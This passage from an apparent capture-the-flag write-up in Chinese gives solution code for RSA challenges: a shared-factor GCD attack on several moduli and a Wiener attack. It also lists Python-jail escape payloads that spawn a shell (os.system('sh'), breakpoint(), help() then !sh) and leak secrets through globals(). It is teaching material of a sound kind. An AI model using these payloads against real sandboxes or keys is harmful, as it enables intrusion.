n4 = 12221355905532691305226996552124162033756814028292708728711809229588190407700199452617060657420166395065565154239801465361510672853972152857415394695376825120759202857555325904640144375262531345320714166285999668052224661520834318497234299585219832943519644095197479639328120838919035625832361810964127485907587199925564724081163804724975965691571850962714258888527902920462746795712011579424322515292865504642938090200503979483095345893697972170153990274670257331483858538617460680462369680572833191232126527727222302641204529110948993583190295067970240051042000918629138767209918572311469915774910003970381965123241
c4 = 2248834602646305164283014556051672824689884721514190813323189875541899566338153534858709617544459297836048770439230174669883719627734394673012731609952869246171300132019334542245094425654362711870373095782083791160029789553806741967408922001051006100049326921742208757147339981269528740944842177729701945606827918253016001436218891580980192743564642120923356793292885805519110411357830040053435569937296612987581482128241218218550319154933831743819546558930918761162723110000328532730751591375727881221199739397698390594797621758011191224528339478784930214820615602510460640307707682865125229937141010351138099874025
n5 = 18152103454920389919231636321286527841833809319334215885641536161086810144890443857211776387914779781628740172079478910188540146498426564211851629962338413488555121865779016981727229209606498886170396500155102635962395243364899026418106378234307821492609778555173516000309435730752571818439328803899462791834490025768785383592935046996428331508608555503567191807692523852530836008436655164751054189301721070209363416058642811329040202582026786024825518381761299547703962502636888833428457116986351812252188468878701301184044948733274488264320930936362549028124581962244201377136969591119942276742760215403738913067567
c5 = 2797812094994121597295362327809389195134238119144547570610194659000554967367804835006774413888965325870488368112707535584687083342412367127561646136089638402907513075405746055834487062923240856950047936297155455745928810738711368950139327254040579266046642851362228893522740216519732851152162928545416236075387903789535000820423985522550638100049857678600662008021574841083416323980817348573062083159710189689337626277009675683473560325178417766400002763719953723259300977655801234386662217462862844994462505601804422871991694828697337752697234180117437785537788728412520613916334045368736691714704501962513954509705
n6 = 22877887459293720334652698748191453972019668578065068224653972884599636421200068659750242304040301306798039254241668648594556654589309801728248683586229288074709849246660525799452637187132633064172425677552176203292787732404537215347782229753837476655088638984496409603054524994383358547132112778403912563916886533181616856401929346567686400616307916690806467019665390260267596320840786982457521423178851498130935577260638269429250197050326097193841333205073650802709022947551398142692735680419453533128176592587955634333425401930362881423044363132586170013458300714163531162544301477356808388416864173949089028317961
c6 = 12271947322974809255127222556723394446467844330408506340843897575503534175121932185624776713618037572593449207329510171212097269297133492090526270770286000839978630002819714376964416081198925899119135271459404333829811516667576167576916805217016117373027245648473458331936273975110163065432285322832123169216976420362833557809289561705091817949915218278430834098156335989014645979633658818904753942786129126233956314517292746008579152368541316795082120147520597254020266752859205131887527661767589367756335766220841483940854397440079467053684289006956034944336788288196391829411432383541473132962783883758561108297747
n7 = 19844333358004073542783728196775487079202832688982038135532362073659058674903791697765527614270399097276261983744620537925712167578187109058145015032736796457938148615396547198728652435169126585595701228287449135664667959433491335769206692390262797325133960778920452511673878233190120432257482339068405290918739453464061987163074129048150451046315248186376609350095502130018696275764450248681787926130463463923862832714969425813770847493135627599129546112143050369344208092649256659330284904392961574494907186727388685504929586018639846040474616307662546605623294842316524163106100888851228858194942825157286544846177
c7 = 9531264751315473345056673937611382755236533664089452852716992791452558274873158812669513178040971923528201631609089069182049526587423864397527252061341857426422965190913745048414029690931254119437249218321954899956104589066479231204536856131403590472063496956452030342299863907499976917750846369802185896519725837163530049157920978007252920334447236842959033879772444475877613295594785710745889554296655932909212643500877218304116451889820444820534937901427158918411546484157737612926382420354101675658160847653151539420222526999426483473829341628599881460824765758346670633385844187252696874025582747177333702736465
n8 = 16956880944655068255446705024149899655327230949463546092744762226005904114738078692036960935391303255804754787864713189658290361949509917704853428701870609882427423574672772606814823959758208695540116440342488334213300943604780971422918744381486937517952553797134323570131582724393100092308466968491068503301604506186521656059375518680612292667310641047190088814753025794048591445267711939066523165042651430468971452726568222388482323097260496415484997546126185688914792795834046855221759289007609518312601640548469651358391745947588643697900883634533872314566389446271647587564348026861264979727062157272541149018781
c8 = 16110326928338602237561005337578085623028116490564329920738844771341250444164294693848130674347672763073995755532723894042946521372321947507527854966013459795492930736187058535665041545095683801386814190612817128504426590828954205050425979880047802547011117626354405687170961272200066258220699329112978151044633994329352673342582175349200008181837211288847301836681860817044391028992501763375849046751094019224570802498414368189170656992427042010362385494565216988561215657424755648213390551881450141899860811844684546992754530755092358644968088017107313907435586729574798046187046145596726569637758312033849476689378
n9 = 16472195897077185060734002588086375750797253422014472876266294484788862733424113898147596402056889527985731623940969291811284437034420929030659419753779530635563455664549165618528767491631867637613948406196511848103083967995689432928779805192695209899686072900265108597626632371718430059561807147486376536203800038054012500244392964187780217667805308512187849789773573138494622201856638931435423778275004491853486855300574479177472267767506041000072575623287557610576406578525902565241580838652860552046216587141709709405062150243990097835181557208274750462554811004137033087430556692966525170882625891516050207318491
c9 = 11867731823522211833301190385669833752050387304375114576570892885641949969365352586215693183003550684262313893105989683214739695968039039944442567581277252581988489020834299896625977474857889570528169919064941042132119301236852358823696947330423679033138054012027878783478922023431469564210485180679933264749281963405243082505688901662659030897104957499953192201440290084373968716271056483463909282407034181891901928790601973222643210525000717355062752079302291729448234374709852429885984987094307177760741403086538949190424454337896501402430653783597070178968921411867485584517214777073301007918941216316241784521708
n10 = 13890749889361612188368868998653029697326614782260719535555306236512452110708495623964530174188871342332417484996749651846510646453983388637377706674890018646246874688969342600780781646175634455109757266442675502522791531161284420286435654971819525519296719668701529481662071464145515727217108362496784024871976015116522898184301395037566514980846499856316532479656908169681719288258287756566886281183699239684997698487409138330229321935477734921670373632304542254938831218652340699024011371979519574576890581492623709896310465567043899767342676912434857372520308852745792360420376574037705943820090308501053778144141
c10 = 6250115196713939477947942995075509357173312813431601073354390451609559579925704891503987992181988654989477525811826607070378476102616752398280691012244301950194800995432882828020405062344160270290542566163969692748126314259624623341922057435728127596172871894887055305291345372720594481096374310285437492746765510292863238933163142677773310305789984897974266961231555124787205980411992251387207335655129551950825339766848166539671565212408741432649813058363660321480995187545006718837863674527475323414266732366507905974800565463011676462244368010182725161416783875646259625352308599198614681446394427674340328493047
n11 = 21457499145521259498911107987303777576783467581104197687610588208126845121702391694574491025398113729462454256070437978257494064504146718372095872819969887408622112906108590961892923178192792218161103488204912792358327748493857104191029765218471874759376809136402361582721860433355338373725980783308091544879562698835405262108188595630215081260699112737457564998798692048522706388318528370551365364702529068656665853097899157141017378975007689790000067275142731212069030175682911154288533716549782283859340452266837760560153014200605378914071410125895494331253564598702942990036163269043699029806343766286247742865671
c11 = 6269656777204332618433779865483197625538144405832409880710764183039800286008967127279281167109250083159801218370191973055663058165456565194979210256278526713608759141588082614531352489547674696723140599892318118960648862531538435596775798128845789504910467783731144808685373807716609662688064728614003904579841055786083326311313295311152563668422289435606771091246147867715987583149743032723028324394173498623642539175178996531881058274717907066845565199058931743481410454382746158558886667761300257488769795092777021292335562818583719708133179974425584610403335487082478848975656282384575767178925517257692365828720
from Crypto.Util.number import *
import gmpy2
e=65537
names = locals()
for i in range(1,10):
    for k in range(i+1,12):
      if GCD(names['n'+str(i)],names['n'+str(k)])!=1:
        print(i,k)
p = GCD(n3,n11)
q =  n3//p      
d=gmpy2.invert(e,(p-1)*(q-1))
m=pow(c3,d,n3)
print(long_to_bytes(m))
        

giant_e

维纳攻击

import gmpy2
import libnum

def continuedFra(x, y):
    cf = []
    while y:
        cf.append(x // y)
        x, y = y, x % y
    return cf
def gradualFra(cf):
    numerator = 0
    denominator = 1
    for x in cf[::-1]:
        numerator, denominator = denominator, x * denominator + numerator
    return numerator, denominator

def solve_pq(a, b, c):
    par = gmpy2.isqrt(b * b - 4 * a * c)
    return (-b + par) // (2 * a), (-b - par) // (2 * a)

def getGradualFra(cf):
    gf = []
    for i in range(1, len(cf) + 1):
        gf.append(gradualFra(cf[:i]))
    return gf

def wienerAttack(e, n):
    cf = continuedFra(e, n)
    gf = getGradualFra(cf)
    for d, k in gf:
        if k == 0: continue
        if (e * d - 1) % k != 0:
            continue
        phi = (e * d - 1) // k
        p, q = solve_pq(1, n - phi + 1, n)
        if p * q == n:
            return d

n = 0xbaa70ba4c29eb1e6bb3458827540fce84d40e1c966db73c0a39e4f9f40e975c42e02971dab385be27bd2b0687e2476894845cc46e55d9747a5be5ca9d925931ca82b0489e39724ea814800eb3c0ea40d89ebe7fe377f8d3f431a68d209e7a149851c06a4e67db7c99fcfd9ec19496f29d59bb186feb44a36fe344f11d047b9435a1c47fa2f8ed72f59403ebb0e439738fd550a7684247ab7da64311690f461e6dce03bf2fcd55345948a3b537087f07cd680d7461d326690bf21e39dff30268cb33f86eeceff412cd63a38f7110805d337dcad25e6f7e3728b53ca722b695b0d9db37361b5b63213af50dd69ee8b3cf2085f845d7932c08b27bf638e98497239
e = 0x609778981bfbb26bb93398cb6d96984616a6ab08ade090c1c0d4fedb00f44f0552a1555efec5cc66e7960b61e94e80e7483b9f906a6c8155a91cdc3e4917fa5347c58a2bc85bb160fcf7fe98e3645cfea8458ea209e565e4eb72ee7cbb232331a862d8a84d91a0ff6d74aa3c779b2b129c3d8148b090c4193234764f2e5d9b2170a9b4859501d07c0601cdd18616a0ab2cf713a7c785fd06f27d68dff24446d884644e08f31bd37ecf48750e4324f959a8d37c5bef25e1580851646d57b3d4f525bc04c7ddafdf146539a84703df2161a0da7a368675f473065d2cb661907d990ba4a8451b15e054bfc4dd73e134f3bf7d8fa4716125d8e21f946d16b7b0fc43
c = 0x45a9ce4297c8afee693d3cce2525d3399c5251061ddd2462513a57f0fd69bdc74b71b519d3a2c23209d74fcfbcb6b196b5943838c2441cb34496c96e0f9fc9f0f80a2f6d5b49f220cb3e78e36a4a66595aa2dbe3ff6e814d84f07cb5442e2d5d08d08aa9ccde0294b39bfde79a6c6dcd2329e9820744c4deb34a039da7933ddf00b0a0469afb89cba87490a39783a9b2f8f0274f646ca242e78a326dda886c213bc8d03ac1a9150de4ba08c5936c3fe924c8646652ef85aa7ac0103485f472413427a0e9d9a4d416b99e24861ca8499500c693d7a07360158ffffa543480758cafff2a09a9f6628f92767764fa026d48a9dd899838505ae16e38910697f9de14
d = wienerAttack(e, n)
m = pow(c, d, n)
print(libnum.n2s(m))

pyjail

Jail Level 0

没有过滤
__import__('os').system('sh')拿到shell

Jail Level 1

限制payload 长度12
breakpoint()

Jail Level 2

长度 6 help()
随便输入一个模块 比如 os 然后 !sh 拿到shell

Jail Level 3

ｂreakpoint()用特殊符号b绕过
需要在linux nc

Jail Level 4

py2 eval(input('>>>>>'))

看看源码

Leak Level 0

拿key进后门
globals()

Leak Level 1

长度6
vars()

Leak Level 2

help() –》 __mian__拿到key